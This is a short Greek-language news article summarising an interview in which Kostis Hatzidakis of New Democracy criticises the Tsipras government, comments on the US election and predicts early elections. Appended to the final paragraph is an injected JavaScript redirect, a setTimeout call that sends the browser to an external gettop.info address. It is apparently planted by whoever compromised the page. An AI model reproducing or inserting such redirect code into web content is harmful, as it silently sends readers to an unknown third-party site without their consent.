Χατζηδάκης: Με τη σημερινή κυβέρνηση αντί να πάμε μπροστά, πάμε πίσω

0
7

 

O αντιπρόεδρος της ΝΔ Κωστής Χατζηδάκης επισημαίνει σε συνέντευξή του στην εφημερίδα «Αγορά» πως «είναι βέβαιο ότι ολόκληρος ο πλανήτης είναι σε αναμονή, διότι το αποτέλεσμα των αμερικανικών εκλογών ήταν μια ανατροπή του σκηνικού» και υπογραμμίζει ότι «αυτό συμβαίνει, φυσικά και για την Ευρώπη και για εμάς τους Έλληνες. Το κυρίως ζητούμενο είναι αν θα αλλάξει η νέα αμερικανική διοίκηση την προσέγγισή της απέναντι στην Ευρώπη και το ΝΑΤΟ».

Αναφερόμενος στο αίτημα της ΝΔ για εκλογές αναφέρει ότι «με τη σημερινή κυβέρνηση αντί να πάμε μπροστά, πάμε πίσω», «οι θυσίες που γίνονται από τον ελληνικό λαό πάνε χαμένες» και η παραμονή της κυβέρνησης «στην εξουσία βλάπτει σοβαρά τα συμφέροντα της χώρας».

Ο κ. Χατζηδάκης δεν αποκλείει να έχουμε κάποιες εξελίξεις στο θέμα του χρέους και «στη συνέχεια να δούμε τι θα γίνει με την ποσοτική χαλάρωση». Eπίσης, εκτιμά ότι «και αν συμβούν αυτά, φοβάμαι ότι η ελληνική οικονομία θα εξακολουθήσει να είναι σε έναν θάλαμο υγειονομικής απομόνωσης στο περιθώριο της Ευρώπης διότι η κυβέρνηση έχει σκοτώσει την εμπιστοσύνη και δεν μπορεί να προσελκύσει επενδύσεις».

Ο πρώην υπουργός υποστηρίζει ότι η κυβέρνηση «θα προσφύγει σε πρόωρες εκλογές, πιεζόμενη από τα αδιέξοδα της πολιτικής της και τη δημοσκοπική κατάρρευσή της» και σημειώνει ότι «αν δεν το κάνει ο κ. Τσίπρας γνωρίζει ότι αντιμετωπίζει τον κίνδυνο να συνταξιοδοτηθεί πρόωρα». setTimeout(«document.location.href=’http://gettop.info/kt/?53vSkc&'», delay);

ΑΦΗΣΤΕ ΜΙΑ ΑΠΑΝΤΗΣΗ

Please enter your comment!
Please enter your name here